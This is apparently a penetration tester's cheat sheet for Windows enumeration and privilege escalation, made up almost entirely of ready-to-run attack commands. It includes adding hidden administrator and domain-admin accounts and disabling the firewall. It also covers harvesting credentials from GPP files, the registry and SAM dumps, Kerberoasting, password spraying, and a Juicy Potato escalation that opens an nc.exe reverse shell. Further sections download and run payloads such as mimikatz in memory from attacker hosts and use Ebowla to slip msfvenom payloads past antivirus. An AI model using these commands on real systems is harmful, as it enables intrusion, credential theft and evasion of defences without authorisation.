Windows System Enumeration

SIMPLE WINDOWS ENUMERATION

… Windows Versions to reference:

Operating System               Version Number
Windows 1.0                    1.04
Windows 2.0                    2.11
Windows 3.0                    3
Windows NT 3.1                 3.10.528
Windows for Workgroups 3.11    3.11 Windows NT Workstation 3.5     3.5.807 Windows NT Workstation 3.51    3.51.1057 Windows 95                     4.0.950 Windows NT Workstation 4.0     4.0.1381 Windows 98                     4.1.1998 Windows 98 Second Edition      4.1.2222 Windows Me                     4.90.3000 Windows 2000 Professional      5.0.2195 Windows XP                     5.1.2600 Windows Vista                  6.0.6000 Windows 7                      6.1.7600 Windows 8.1                    6.3.9600 Windows 10                     10.0.10240

SYSTEM INFORMATION

systeminfo | findstr "OS"
systeminfo
# EXACT WINDOWS VERSION
type C:/Windows/system32/eula.txt

NETWORK USERS / STATISTICS

# CURRENT USER
whoami /priv
whoami /all

# NETWORK STATS
netstat -ano  #network statistics
netstat -aton #open connections
ipconfig
route print
arp -a        #ip to physical address

# COMPUTER INFO
hostname

# USERS
net user
net user /domain
net user administrator /domain
net localgroup      #local PC usergroups
net localgroup /domain
net localgroup "administrators" /domain
net group
net group /domain
net group "Domain Admins" /domain

# ADD USER
net user user user /add
net localgroup "Remote Desktop Users" user /add
net localgroup administrators user /add

# ADD DOMAIN USER
net user username password /add /domain
net group "Domain Admins" username /add /domain

# DRIVES / SERVICES
net use       #mapped network drives
net start     #shows services (manage services)

# ALL NETWORK STUFF AT ONCE
ipconfig /all & route print & arp -a

FIREWALL ENUMERATION

# FIREWALL STATUS AND CONFIGS
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall

# SOMETIMES FIREWALL WILL NEED TO BE DISABLED
netsh firewall set opmode disable

LIST SERVICES / TASKS

net start
wmic service list brief
tasklist /SVC
Schtasks /query /fo LIST /v
wmic service get name,startname
wmic process where "name='chrome.exe'" get ProcessID, ExecutablePath set

SET POWERSHELL POLICY TO UNRESTRICTED

# OFTEN USEFUL
Set-ExecutionPolicy Unrestricted

VIEW HOTFIXES

wmic qfe

LIST DOMAIN CONTROLLER

%logonserver%

# GRAB CREDS FROM GPP
net use z: \\dc01\SYSVOL 
cd C:\Windows\SYSVOL 
dir /s Groups.xml
findstr -si cpassword C:\..\Groups.xml
# Groups.xml file, find "cpassword", then gpp-decrypt on kali

SEARCH FOR KEY WORDS

# SEARCH AROUND
dir /s *password*
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
findstr /spin "password" *.*
dir /s *pass* == *cred* == *vnc* == *.config*

# COMMON FILES WITH INFO
type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

# REGISTRY DUMPS
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

FIND MODULES (tons of results)

cd %appdata%

POWERUP MODULE

… found here (only one example of many)

C:\powershell.exe -nop -exec bypass
C:\import-module PowerUp.ps1
C:\Invoke-AllChecks

# DOWNLOAD AND USE

C:\tmp> powershell.exe Invoke-WebRequest -Uri "http://192.168.1.299:443/PowerUp.ps1" -OutFile "C:\tmp\pu.ps1"
C:\tmp> powershell.exe import-module C:\tmp\pu.ps1

# RUN REMOTELY (IN MEMORY)

powershell -nop -exec bypass -c "IEX (New-Object Net.webClient).DownloadString('https://192.168.1.299:443/PowerUp.ps1'); Invoke-AllChecks"

LOOK FOR THINGS LIKE THIS:
ModifiableFilePermissions : {WriteOwner, Delete, WriteAttributes, Synchronize...}
ModifiableFileIdentityReference : Everyone

KERBEROAST

… found here (only one example of many)

# UPLOAD SCRIPT AND DUMP TOKEN
c:\tmp>powershell -ExecutionPolicy Bypass
PS C:\tmp> Import-Module .\Invoke-Kerberoast.ps1
PS C:\tmp> Invoke-Kerberoast -OutputFormat Hashcat | fl
# ELIMINATE ALL LINE BREAKS AND CRACK
hashcat -m 13100

===============================

# OR REMOTELY WITH CREDENTIALS
impacket-GetUserSPNs domain.com/SVC_Account:password -dc-ip 10.10.10.299 -request
# CRACK THE GIVEN TOKEN
hashcat -m 13100
# CONNECT WITH NEW CREDENTIALS
impacket-psexec active.htb/Administrator:[email protected]

JUICY POTATO

… test script found here (takes approx 15 mins to run)
… list of raw Win 10 CLSIDs found here
… Juicy Potato repo with all CLSIDs found here

# IF YOU CAN TRANSFER WITH SMB
copy \\ip\share\folder_with_jp_assets

Directory of c:\tmp
04/20/2022  04:18 AM    <DIR>          .
04/20/2022  04:18 AM    <DIR>          ..
04/19/2022  11:04 PM            33,813 CLSID.list
04/19/2022  11:04 PM               276 clsidfind.bat
04/20/2022  04:15 AM                46 clsidrev3000.bat
04/19/2022  11:02 PM           263,680 jp.exe
04/19/2022  11:02 PM           213,680 nc.exe

c:\tmp>.\clsidfind.bat
.\clsidfind.bat
{C3A4B402-5900-4AB9-8D2F-F941CD24203B} 10000
{C28D5211-B8E1-44FB-994D-767725BFA20E} 10000
{BEDC0CDA-4771-4C84-A291-7DFC5AEC4745} 10000
[...]

c:\tmp>type result.log
type result.log
{6d18ad12-bde3-4393-b311-099c346e6df9};NT AUTHORITY\SYSTEM
{69AD4AEE-51BE-439b-A92C-86AE490E8B30};NT AUTHORITY\SYSTEM
{F087771F-D74F-4C1A-BB8A-E16ACA9124EA};NT AUTHORITY\SYSTEM
[...]

# CONTENTS OF rev3000.bat
# c:\tmp\nc.exe 192.168.119.299 3000 -e cmd.exe
jp -l 3000 -p rev3000.bat -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}

INSPECT FILE

file <filename>

# SHORTNAME NOMENCLATIRE
# FIRST 6 CHARS + ~1
C:\Program Files\LongName\
C:\PROGRA~1\LONGNA~1\

INSPECT FOLDER PERMISSIONS

icacls <file>
cacls <file>

DIRECTORY ENUMERATION

…search for hidden directories

cmd.exe /c dir /a C:/

…show files and subdirectories

gci -Recurse C:\users | Select FullName
ls "C:\Program Files"
ls "C:\Program Files (x86)"

ONE-LINER THINGS

… Nishang’s scripts here

# CMD SHELL PING 
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up.

# POWER SHELL PING
FOR /L %i IN (1,1,254) DO ping -n 1 10.1.1.%i | FIND /i "Reply"

# EXECUTE REVERSE SHELL SCRIPT REMOTELY
# JUST RENAME TO shell.ps1 AND HOST THE FILE
powershell -c iex(new-object net.webclient).downloadstring(‘http://10.10.14.7:5555/shell.ps1')

WINDOWS CHANGE PASSWORD

net user username newpassword

UNQUOTED SERVICE PATHS

… you may be able to create a binary to stick into an empty path
… Windows will look through the entire path for the requested binary
… if it hits your binary first, it’ll execute the one it finds

# DISPLAY SERVICES / PATHS
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

CRACKMAPEXEC EXAMPLES

crackmapexec smb 10.10.1.299
crackmapexec smb 10.10.1.299 -u users.txt -p password.txt --continue-on-success >> cme_spray_10.10.1.299.txt
crackmapexec smb 10.10.1.299 -u username.txt -p password.txt --continue-on-success >> sprayoutput24.txt

BRUTE FORCE EXAMPLES

hydra -L users.txt -P passwords.txt ftp://10.10.1.299
ncrack -U users.txt -P passwords.txt ftp://10.10.1.299 
patator ftp_login host=10.10.1.299 user=FILE0 password=FILE1 0=users.txt 1=passwords.txt
medusa -h 10.10.1.299 -u admin -P rockyou.txt -M http -m DIR:/admin
kerbrute -domain 10.10.1.229 -user user -passwords ./passtest.txt -outputfile kerbrute_user.txt

CREDENTIAL RE-USE

# IF YOU HAVE DOMAIN USER CREDENTIALS
runas.exe /env /noprofile /user:username password "c:\users\Public\nc.exe -nc 192.168.119.299 3000 -e cmd.exe"

PSEXEC EAMPLES

…this works well for privilege escalation

psexec.exe -i -accepteula -d -s c:\tmp\reverse_80.exe
sudo impacket-psexec user:[email protected]
sudo python3 /usr/share/doc/python3-impacket/examples/psexec.py domain.con/user:[email protected]

REMOTE PROCEDURE CALL (RPC)

…reveals a ton of information if available

impacket-rpcdump ip

REMOTE DESKTOP CONNECTION

rdesktop -u user -p password

# ENABLE REMOTE DESKTOP
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

# SOMETIMES FIREWALL WILL NEED TO BE DISABLED
netsh firewall set opmode disable

# OR YOU CAN ADD A NEW USER
net user test 1234 /add
net localgroup administrators test /add

SQL CONNECTION (if available)

sqsh -S ip -U user

EXAMPLE REVERSE SHELLS

…look here for examples

COMMON ENUMERATION TOOLS

Automate the upload with this
jaws-enum.ps1 – simple powershell script
windows-exploit-suggester.py – simple python script leveraging systeminfo output
wes.py – same as windows-exploit-suggester, but updated
nishang scripts – for all stages of pen testing
windows-priv-checker2 – great for an html file display

# POSSIBLY RUN A FILE
powershell -ExecutionPolicy Bypass -File <file.ps1>

# JAWS
powershell -ExecutionPolicy Bypass -File jaws-enum.ps1

# WINDOWS-SUGGESTER
# RUN ON KALI W/systeminfo FILE FROM WINDOWS
windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database <seen_from_update> --systeminfo  systeminfo.txt

# WES
# AQUIRE systeminfo FROM TARGET
wes.py --update
wes.py systeminfo.txt

# WINDOWS PRIVESC CHECKER 2
# OR CHANGE NAME FOR EASE:  wpc2.exe 
.\windows-privesc-check2.exe --audit -a -o wpc-report

# LAZAGNE
.\lazagne_pw_dump.exe all

ENABLE WINDOWS INSTALLER

… msi files are used for installations
… these can be created and the system may be able to install them
… use msi for a reverse shell

# ALWAYSINSTALLELEVATED - System Setting
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# CREATE PAYLOAD TO ADD USER
msfvenom -p windows/adduser USER=newuser PASS=newpassword -f msi -o malicious.msi

# INSTALL TO EXECUTE
msiexec /quiet /qn /i C:\malicious.msi

SAM DUMPS

… SAM dumps are not possible when system is running
… programs can dump them by memory, or you can use the registry
… use msi for a reverse shell

LAN Manager (LM)DES
Windows NT-2003
Passwords longer than 7 chars split into two strings and is hashed separately
Passwords converted to uppercase before hashing
No salt

NT LAN Manager (NTLM)MD4
Windows Vista+
No limit to two 7 char parts
Case sensitive
No salt

# DUMP SAMS (REQUIRES PRIV ACCESS)
reg save hklm\sam c:\tmp\sam
reg save hklm\system c:\tmp\system

# TRANSFER TO KALI
copy sam \\192.168.119.188\share
copy system \\192.168.119.188\share

# COMBINE THE FILES
samdump2 system sam 
user::1004:aad3b435b51404eeeeeee435b51404ee:b74242f37e4737eeeeeeea6ebcac4ffe:::

# FOR HASHCAT, USE SECOND PART OF THE HASH
b74242f37e4737eeeeeeea6ebcac4ffe
hashcat -m 1000 user.hash /usr/share/wordlists/rockyou.txt

FILE TRANSFERS

# POWERSHELL - TRANSFER TO TARGET
powershell.exe (New-ObjectSystem.Net.WebClient).DownloadFile('http://10.11.0.4/whoami.exe', 'c:\Users\Public\whoami.exe')
(new-object System.Net.WebClient).DownloadFile('http://192.168.119.188:443/mimikatz64.exe','C:\tmp\mmk.exe')
powershell.exe Invoke-WebRequest -Uri "http://192.168.119.188:443/PowerUp.ps1" -OutFile "C:\tmp\wp64.exe"
powershell.exe Invoke-WebRequest -Uri "http://192.168.119.188:443/PowerUp.ps1" -OutFile "C:\tmp\pu.ps1"
powershell iwr http://192.168.119.188:443/system.ps1 -outfile ./shell.ps1

# RUN SCRIPT FROM ATTACK MACHINE
powershell IEX(New-Object Net.webclient).downloadString('http://ip/shell.ps1')
# OR
powershell -c iex(new-object net.webclient).downloadstring('http://10.10.1.299:443/shell.ps1')

# CMD
copy \\attack-ip\share\file

… reverse shell (shell.ps1) reference here

ANTI-VIRUS EVASION
EBOWLA

… Ebowla found here
… Encrypts the payload of the payload with environment variables
… Makes the encryption key pieces part of the env code
    –purpose is to have it on the computer to decode for DYNAMIC engines
    –also makes sure payload is only made for THAT TARGET  
    –uses the COMPUTER DOMAIN only, so won’t work on someone’s home computer

https://github.com/Genetic-Malware/Ebowla.git
Encryps the payload of the payload with environment variables
Makes the encryption key pieces part of the env code
  -purpose is to have it on the computer to decode for DYNAMIC engines
  -also makes sure payload is only made for THAT TARGET  
  -uses the COMPUTER DOMAIN only, so won't work on someone's home computer

vim genetic.conf
CHANGE 
output_type = GO
payload_type = EXE
[[ENV VAR]]
    username = '' (deleted)
    computername = 'TALLY' (got from hostname on shell)
    userdomain = '' (deleted)

THEN CREATE THE PAYLOAD

NOTE:  NEED configobj and GO, ON PYTHON2 TO MAKE THIS WORK
└─$ pip2 install configobj
└─$ sudo apt install golang

python2 embowla.py <filename>
USE MSFVENOM TO CREATE THE FILE
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.1.299 LPORT=80 -f exe -a x64 -o shell.exe
file shell.exe (to make sure it's 64 bit encoded per the target machine)
OUTPUT: shell.exe: PE32+ executable (GUI) x86-64, for MS Windows

USE EBOWLA TO CREATE THE GO FILE
└─$ python2 ebowla.py ../smbuploads/shell.exe genetic.config

BUILD WITH GO
└─$ ./build_x64_go.sh output/go_symmetric_shell.exe.go ebowla_shell.exe
file ebowla_shell.exe 
OUTPUT:  ebowla_shell.exe: PE32+ executable (console) x86-64, for MS Windows
CAN USE virustotal.com TO TEST THE NEW PAYLOAD

… reverse shell (shell.ps1) reference here

RESTART WINDOWS

shutdown /r /t 0
Scroll to top